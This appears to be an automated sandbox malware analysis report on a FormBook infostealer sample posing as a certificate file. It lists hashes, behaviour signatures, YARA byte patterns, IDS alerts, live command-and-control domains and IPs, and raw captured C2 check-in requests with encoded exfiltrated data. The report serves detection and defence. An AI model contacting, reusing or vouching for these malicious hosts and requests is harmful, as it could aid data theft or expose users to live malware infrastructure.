Windows Analysis Report
Certificate 11-19AIS.exe

Overview

General Information

Sample name: Certificate 11-19AIS.exe
Analysis ID: 1562318
MD5: 1e1db5d9c073fcff1706c32d887e3e28
SHA1: 76cd9d1e4b8817fccba215ecdf8916a8e9bcbe8b
SHA256: 4de8d7a95ca5edd2a521f7232b56b02d2f684f1638a2a704270631c127ba9c02
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Certificate 11-19AIS.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\Certificate 11-19AIS.exe" MD5: 1E1DB5D9C073FCFF1706C32D887E3E28)
    • svchost.exe (PID: 7940 cmdline: "C:\Users\user\Desktop\Certificate 11-19AIS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • auecFLppjswMvwfJiAu.exe (PID: 5940 cmdline: "C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • auecFLppjswMvwfJiAu.exe (PID: 3796 cmdline: "C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x337a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1ce3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-19AIS.exe, ParentProcessId: 7852, ParentProcessName: Certificate 11-19AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ProcessId: 7940, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-19AIS.exe, ParentProcessId: 7852, ParentProcessName: Certificate 11-19AIS.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-19AIS.exe", ProcessId: 7940, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-25T13:57:30.494965+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49764 | 154.215.72.110 | 80 | TCP
            2024-11-25T13:58:04.614278+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49844 | 116.50.37.244 | 80 | TCP
            2024-11-25T13:59:28.291434+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49899 | 85.159.66.93 | 80 | TCP
            2024-11-25T13:59:43.521796+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49987 | 91.195.240.94 | 80 | TCP
            2024-11-25T14:00:07.086273+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49991 | 66.29.149.46 | 80 | TCP
            2024-11-25T14:00:22.539513+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49995 | 195.110.124.133 | 80 | TCP
            2024-11-25T14:00:54.382040+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49999 | 217.196.55.202 | 80 | TCP

            AV Detection

            Source: http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q | Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/ | Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/ | Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= | Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= | Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/ | Avira URL Cloud: Label: malware
            Source: Certificate 11-19AIS.exe | ReversingLabs: Detection: 71%
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Certificate 11-19AIS.exe | Joe Sandbox ML: detected
            Source: Certificate 11-19AIS.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382456164.00000000003FE000.00000002.00000001.01000000.00000004.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000000.1529575482.00000000003FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F6CA9 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_007F6CA9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, | 0_2_007F60DD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, | 0_2_007F63F9
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_007FEB60
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FF56F FindFirstFileW,FindClose, | 0_2_007FF56F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_007FF5FA
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00801B2F
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00801C8A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00801F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00801F94
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282BAB0 FindFirstFileW,FindNextFileW,FindClose, | 4_2_0282BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 4_2_02819480
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 4_2_0281DD45
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_02E0053E

            Networking

            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49764 -> 154.215.72.110:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49844 -> 116.50.37.244:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49987 -> 91.195.240.94:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49991 -> 66.29.149.46:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49995 -> 195.110.124.133:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49899 -> 85.159.66.93:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.11:49999 -> 217.196.55.202:80
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox View | IP Address: 91.195.240.94
            Source: Joe Sandbox View | IP Address: 154.215.72.110
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries)
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00804EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_00804EB5
            Source: global traffic | HTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.3xfootball.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.goldenjade-travel.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.magmadokum.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Q HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.rssnewscast.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?zh=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&HpnH2=lZrlsdK8B4Q HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.techchains.info | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.elettrosistemista.zip | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | HTTP traffic detected: GET /fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.empowermedeco.com | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global traffic | DNS traffic detected: DNS query: www.3xfootball.com
            Source: global traffic | DNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global traffic | DNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global traffic | DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global traffic | DNS traffic detected: DNS query: www.magmadokum.com
            Source: global traffic | DNS traffic detected: DNS query: www.rssnewscast.com
            Source: global traffic | DNS traffic detected: DNS query: www.liangyuen528.com
            Source: global traffic | DNS traffic detected: DNS query: www.techchains.info
            Source: global traffic | DNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global traffic | DNS traffic detected: DNS query: www.donnavariedades.com
            Source: global traffic | DNS traffic detected: DNS query: www.660danm.top
            Source: global traffic | DNS traffic detected: DNS query: www.empowermedeco.com
            Source: global traffic | DNS traffic detected: DNS query: www.joyesi.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknown | HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 199 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Data Raw: 7a 68 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 7a 4e 6b 71 64 71 73 48 6e 59 57 6a 72 30 4f 47 34 69 4f 6a 54 77 41 52 5a 5a 4d 4e 6d 50 57 67 3d 3d | Data Ascii: zh=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 12:57:30 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 